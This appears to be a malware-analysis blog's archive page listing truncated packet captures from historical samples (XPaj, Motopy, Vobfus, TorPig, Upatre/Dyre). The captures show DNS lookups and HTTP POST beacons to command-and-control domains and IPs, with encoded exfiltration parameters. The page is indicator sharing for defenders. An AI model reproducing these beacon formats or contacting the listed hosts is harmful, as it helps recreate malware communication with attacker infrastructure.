Category Archives: Other Trojan Families

HISTORICAL Malware Sample – XPaj – Traffic Sample Indicators Analysis

2012-05-02 16:18:32.409570 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], seq 1:1437, ack 1, win 258, length 1436 E…R.@…L……[…>.PA….V\.P…….POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1 Host: nortiniolosto.com Content-Length: 1279 Accept-Encoding: deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Pragma: no-cache Cache-Control: no-cache Connection:… Read More »

Share Button

HISTORICAL Malware Sample – WordPress Motopy – Traffic Sample Indicators Analysis

2013-05-26 22:27:09.810961 IP 172.16.0.130.49165 > 95.163.104.69.80: Flags [P.], seq 1:262, ack 1, win 64240, length 261 E..-..@….d…._.hE.^M.Pk.:.x..xP…UN..POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 782 User-Agent: – Host: www.wholists.org Connection: Keep-Alive Cache-Control: no-cache     2013-05-26 22:27:09.811039 IP 95.163.104.69.80 > 172.16.0.130.49165: Flags [.], ack 262, win 64240, length 0 E..(.@……_.hE…..P.^Mx..xk.;.P…. .. 2013-05-26 22:27:09.811336 IP 172.16.0.130.49165… Read More »

Share Button

HISTORICAL Malware Sample – Vobfus – Traffic Sample Indicators Analysis

2012-12-06 23:14:37.888322 IP 10.0.2.15.1039 > 10.0.2.3.53: 44216+ A? ns1.helpupdated.com. (37) E..A.9….”b … ……5.-1…………..ns1.helpupdated.com….. 2012-12-06 23:14:37.896939 IP 10.0.2.3.53 > 10.0.2.15.1039: 44216 1/0/0 A 222.186.36.128 (53) E..Q….@.b. … ….5…=g’………….ns1.helpupdated.com……………….$. 2012-12-06 23:14:38.406504 IP 10.0.2.15.1041 > 222.186.36.128.9003: Flags [S], seq 923729413, win 65535, options [mss 1460,nop,nop,sackOK], length 0 E..0.:@….D …..$…#+7…….p…………… 2012-12-06 23:14:38.725931 IP 222.186.36.128.9003 > 10.0.2.15.1041: Flags [S.], seq… Read More »

Share Button

HISTORICAL Malware Sample – TorPig – Traffic Sample Indicators Analysis

2013-02-03 17:21:37.376029 IP 172.16.253.129.1044 > 66.240.236.39.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263 E../.%@… …..B..’…P.nm..h$iP…….POST /search2?fr=altavista&itag=ody&q=20ada1700fce9c5798d0d8d65f2e6f9f%2Cc86d66b68cf91360&kgs=1&kls=0 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: annotatinggramma.info Content-Length: 2816 Connection: Keep-Alive Cache-Control: no-cache 2013-02-03 17:21:37.719029 IP 66.240.236.39.80 > 172.16.253.129.1044: Flags [P.], seq 1:1429, ack 3080, win 64240, length 1428 E………S.B..’…..P…h$i.ny%P….N..HTTP/1.1 200 OK Server: nginx Date: Thu, 15 Aug… Read More »

Share Button

Phishing E-mail BreakingNews_pdf.exe Loads Upatre & Dyre X.509 SSL Certificate Malware PCAP Traffic Sample

2014-12-05 10:44:57.627969 IP 192.168.204.134.58400 > 192.168.204.2.53: 706+ A? muihoc[.]com. (28) E..8…………….. .5.$……………muihoc[.]com….. 2014-12-05 10:44:57.905717 IP 192.168.204.2.53 > 192.168.204.134.58400: 706 1/0/0 A 123.30.128.103 (44) E..H5&……………5. .4……………muihoc[.]com……………..{..g 2014-12-05 10:44:57.906500 IP 192.168.204.134.49258 > 123.30.128.103.80: Flags [S], seq 3427013587, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 E..4..@…mQ….{..g.j.P.D…….. .%…………… 2014-12-05 10:44:58.189785 IP 123.30.128.103.80 > 192.168.204.134.49258: Flags [S.], seq 1388600582,… Read More »

Share Button